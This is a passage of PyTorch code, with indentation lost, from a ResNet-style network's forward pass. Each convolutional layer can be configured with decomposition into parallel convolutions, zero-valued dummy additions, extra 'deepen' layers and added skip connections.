X1_0 = self.conv2_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv2_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[2] == 4:
X1_0 = self.conv2_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv2_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv2_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv2_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv2(X1)
else:
X1 = self.conv2(X1)
if self.dummy_list != None:
if self.dummy_list[2] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[2]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn2(X1)
X1 += X0_skip
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[2] == 1:
X1 = self.conv2_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[2] == 1:
X1_skip = X1
X1 = self.conv2_sk(X1)
X1 = self.relu(X1 + X1_skip)
X0_skip = X1
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[3] == 1:
X1_0 = self.conv3_0(X1)
X1_1 = self.conv3_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[3] == 2:
X1_0 = self.conv3_0(X1)
X1_1 = self.conv3_1(X1)
X1_2 = self.conv3_2(X1)
X1_3 = self.conv3_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[3] == 3:
X1_0 = self.conv3_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv3_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[3] == 4:
X1_0 = self.conv3_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv3_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv3_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv3_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv3(X1)
else:
X1 = self.conv3(X1)
if self.dummy_list != None:
if self.dummy_list[3] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[3]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn3(X1)
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[3] == 1:
X1 = self.conv3_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[3] == 1:
X1_skip = X1
X1 = self.conv3_sk(X1)
X1 = self.relu(X1 + X1_skip)
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[4] == 1:
X1_0 = self.conv4_0(X1)
X1_1 = self.conv4_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[4] == 2:
X1_0 = self.conv4_0(X1)
X1_1 = self.conv4_1(X1)
X1_2 = self.conv4_2(X1)
X1_3 = self.conv4_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[4] == 3:
X1_0 = self.conv4_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv4_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[4] == 4:
X1_0 = self.conv4_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv4_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv4_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv4_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv4(X1)
else:
X1 = self.conv4(X1)
if self.dummy_list != None:
if self.dummy_list[4] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[4]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn4(X1)
X1 += X0_skip
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[4] == 1:
X1 = self.conv4_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[4] == 1:
X1_skip = X1
X1 = self.conv4_sk(X1)
X1 = self.relu(X1 + X1_skip)
X0_skip = X1
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[5] == 1:
X1_0 = self.conv5_0(X1)
X1_1 = self.conv5_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[5] == 2:
X1_0 = self.conv5_0(X1)
X1_1 = self.conv5_1(X1)
X1_2 = self.conv5_2(X1)
X1_3 = self.conv5_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[5] == 3:
X1_0 = self.conv5_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv5_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[5] == 4:
X1_0 = self.conv5_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv5_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv5_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv5_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv5(X1)
else:
X1 = self.conv5(X1)
if self.dummy_list != None:
if self.dummy_list[5] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[5]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn5(X1)
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[5] == 1:
X1 = self.conv5_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[5] == 1:
X1_skip = X1
X1 = self.conv5_sk(X1)
X1 = self.relu(X1 + X1_skip)
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[6] == 1:
X1_0 = self.conv6_0(X1)
X1_1 = self.conv6_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[6] == 2:
X1_0 = self.conv6_0(X1)
X1_1 = self.conv6_1(X1)
X1_2 = self.conv6_2(X1)
X1_3 = self.conv6_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[6] == 3:
X1_0 = self.conv6_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv6_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[6] == 4:
X1_0 = self.conv6_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv6_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv6_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv6_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv6(X1)
else:
X1 = self.conv6(X1)
if self.dummy_list != None:
if self.dummy_list[6] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[6]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn6(X1)
X1 += X0_skip
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[6] == 1:
X1 = self.conv6_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[6] == 1:
X1_skip = X1
X1 = self.conv6_sk(X1)
X1 = self.relu(X1 + X1_skip)
X0_skip = X1
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[7] == 1:
X1_0 = self.conv7_0(X1)
X1_1 = self.conv7_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[7] == 2:
X1_0 = self.conv7_0(X1)
X1_1 = self.conv7_1(X1)
X1_2 = self.conv7_2(X1)
X1_3 = self.conv7_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[7] == 3:
X1_0 = self.conv7_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv7_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[7] == 4:
X1_0 = self.conv7_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv7_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv7_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv7_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv7(X1)
else:
X1 = self.conv7(X1)
if self.dummy_list != None:
if self.dummy_list[7] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[7]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn7(X1)
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[7] == 1:
X1 = self.conv7_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[7] == 1:
X1_skip = X1
X1 = self.conv7_sk(X1)
X1 = self.relu(X1 + X1_skip)
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[8] == 1:
X1_0 = self.conv8_0(X1)
X1_1 = self.conv8_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[8] == 2:
X1_0 = self.conv8_0(X1)
X1_1 = self.conv8_1(X1)
X1_2 = self.conv8_2(X1)
X1_3 = self.conv8_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[8] == 3:
X1_0 = self.conv8_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv8_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[8] == 4:
X1_0 = self.conv8_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv8_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv8_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv8_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv8(X1)
else:
X1 = self.conv8(X1)
if self.dummy_list != None:
if self.dummy_list[8] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[8]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn8(X1)
X1 += X0_skip
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[8] == 1:
X1 = self.conv8_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[8] == 1:
X1_skip = X1
X1 = self.conv8_sk(X1)
X1 = self.relu(X1 + X1_skip)
X0_skip = X1
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[9] == 1:
X1_0 = self.conv9_0(X1)
X1_1 = self.conv9_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[9] == 2:
X1_0 = self.conv9_0(X1)
X1_1 = self.conv9_1(X1)
X1_2 = self.conv9_2(X1)
X1_3 = self.conv9_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[9] == 3:
X1_0 = self.conv9_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv9_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[9] == 4:
X1_0 = self.conv9_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv9_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv9_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv9_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv9(X1)
else:
X1 = self.conv9(X1)
if self.dummy_list != None:
if self.dummy_list[9] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[9]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn9(X1)
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[9] == 1:
X1 = self.conv9_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[9] == 1:
X1_skip = X1
X1 = self.conv9_sk(X1)
X1 = self.relu(X1 + X1_skip)
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[10] == 1:
X1_0 = self.conv10_0(X1)
X1_1 = self.conv10_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[10] == 2:
X1_0 = self.conv10_0(X1)
X1_1 = self.conv10_1(X1)
X1_2 = self.conv10_2(X1)
X1_3 = self.conv10_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[10] == 3:
X1_0 = self.conv10_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv10_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[10] == 4:
X1_0 = self.conv10_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv10_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv10_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv10_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv10(X1)
else:
X1 = self.conv10(X1)
if self.dummy_list != None:
if self.dummy_list[10] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[10]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn10(X1)
X1 += X0_skip
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[10] == 1:
X1 = self.conv10_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[10] == 1:
X1_skip = X1
X1 = self.conv10_sk(X1)
X1 = self.relu(X1 + X1_skip)
X0_skip = X1
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[11] == 1:
X1_0 = self.conv11_0(X1)
X1_1 = self.conv11_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[11] == 2:
X1_0 = self.conv11_0(X1)
X1_1 = self.conv11_1(X1)
X1_2 = self.conv11_2(X1)
X1_3 = self.conv11_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[11] == 3:
X1_0 = self.conv11_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv11_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[11] == 4:
X1_0 = self.conv11_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv11_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv11_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv11_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv11(X1)
else:
X1 = self.conv11(X1)
if self.dummy_list != None:
if self.dummy_list[11] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[11]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn11(X1)
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[11] == 1:
X1 = self.conv11_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[11] == 1:
X1_skip = X1
X1 = self.conv11_sk(X1)
X1 = self.relu(X1 + X1_skip)
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[12] == 1:
X1_0 = self.conv12_0(X1)
X1_1 = self.conv12_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[12] == 2:
X1_0 = self.conv12_0(X1)
X1_1 = self.conv12_1(X1)
X1_2 = self.conv12_2(X1)
X1_3 = self.conv12_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[12] == 3:
X1_0 = self.conv12_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv12_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[12] == 4:
X1_0 = self.conv12_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv12_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv12_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv12_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv12(X1)
else:
X1 = self.conv12(X1)
if self.dummy_list != None:
if self.dummy_list[12] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[12]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn12(X1)
X1_saved = X1
X1 = X0_skip
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[13] == 1:
X1_0 = self.conv13_0(X1)
X1_1 = self.conv13_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[13] == 2:
X1_0 = self.conv13_0(X1)
X1_1 = self.conv13_1(X1)
X1_2 = self.conv13_2(X1)
X1_3 = self.conv13_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[13] == 3:
X1_0 = self.conv13_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv13_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[13] == 4:
X1_0 = self.conv13_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv13_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv13_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv13_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv13(X1)
else:
X1 = self.conv13(X1)
if self.dummy_list != None:
if self.dummy_list[13] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[13]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn13(X1)
X1 += X1_saved
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[13] == 1:
X1 = self.conv13_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[13] == 1:
X1_skip = X1
X1 = self.conv13_sk(X1)
X1 = self.relu(X1 + X1_skip)
X0_skip = X1
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[14] == 1:
X1_0 = self.conv14_0(X1)
X1_1 = self.conv14_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[14] == 2:
X1_0 = self.conv14_0(X1)
X1_1 = self.conv14_1(X1)
X1_2 = self.conv14_2(X1)
X1_3 = self.conv14_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[14] == 3:
X1_0 = self.conv14_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv14_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[14] == 4:
X1_0 = self.conv14_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv14_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv14_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv14_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv14(X1)
else:
X1 = self.conv14(X1)
if self.dummy_list != None:
if self.dummy_list[14] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[14]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn14(X1)
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[14] == 1:
X1 = self.conv14_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[14] == 1:
X1_skip = X1
X1 = self.conv14_sk(X1)
X1 = self.relu(X1 + X1_skip)
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[15] == 1:
X1_0 = self.conv15_0(X1)
X1_1 = self.conv15_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[15] == 2:
X1_0 = self.conv15_0(X1)
X1_1 = self.conv15_1(X1)
X1_2 = self.conv15_2(X1)
X1_3 = self.conv15_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[15] == 3:
X1_0 = self.conv15_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv15_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[15] == 4:
X1_0 = self.conv15_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv15_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv15_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv15_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv15(X1)
else:
X1 = self.conv15(X1)
if self.dummy_list != None:
if self.dummy_list[15] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[15]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn15(X1)
X1 += X0_skip
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[15] == 1:
X1 = self.conv15_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[15] == 1:
X1_skip = X1
X1 = self.conv15_sk(X1)
X1 = self.relu(X1 + X1_skip)
X0_skip = X1
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[16] == 1:
X1_0 = self.conv16_0(X1)
X1_1 = self.conv16_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[16] == 2:
X1_0 = self.conv16_0(X1)
X1_1 = self.conv16_1(X1)
X1_2 = self.conv16_2(X1)
X1_3 = self.conv16_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[16] == 3:
X1_0 = self.conv16_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv16_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[16] == 4:
X1_0 = self.conv16_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv16_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv16_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv16_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv16(X1)
else:
X1 = self.conv16(X1)
if self.dummy_list != None:
if self.dummy_list[16] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[16]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn16(X1)
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[16] == 1:
X1 = self.conv16_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[16] == 1:
X1_skip = X1
X1 = self.conv16_sk(X1)
X1 = self.relu(X1 + X1_skip)
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[17] == 1:
X1_0 = self.conv17_0(X1)
X1_1 = self.conv17_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[17] == 2:
X1_0 = self.conv17_0(X1)
X1_1 = self.conv17_1(X1)
X1_2 = self.conv17_2(X1)
X1_3 = self.conv17_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[17] == 3:
X1_0 = self.conv17_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv17_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[17] == 4:
X1_0 = self.conv17_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv17_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv17_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv17_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv17(X1)
else:
X1 = self.conv17(X1)
if self.dummy_list != None:
if self.dummy_list[17] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[17]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn17(X1)
X1 += X0_skip
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[17] == 1:
X1 = self.conv17_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[17] == 1:
X1_skip = X1
X1 = self.conv17_sk(X1)
X1 = self.relu(X1 + X1_skip)
X0_skip = X1
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[18] == 1:
X1_0 = self.conv18_0(X1)
X1_1 = self.conv18_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[18] == 2:
X1_0 = self.conv18_0(X1)
X1_1 = self.conv18_1(X1)
X1_2 = self.conv18_2(X1)
X1_3 = self.conv18_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[18] == 3:
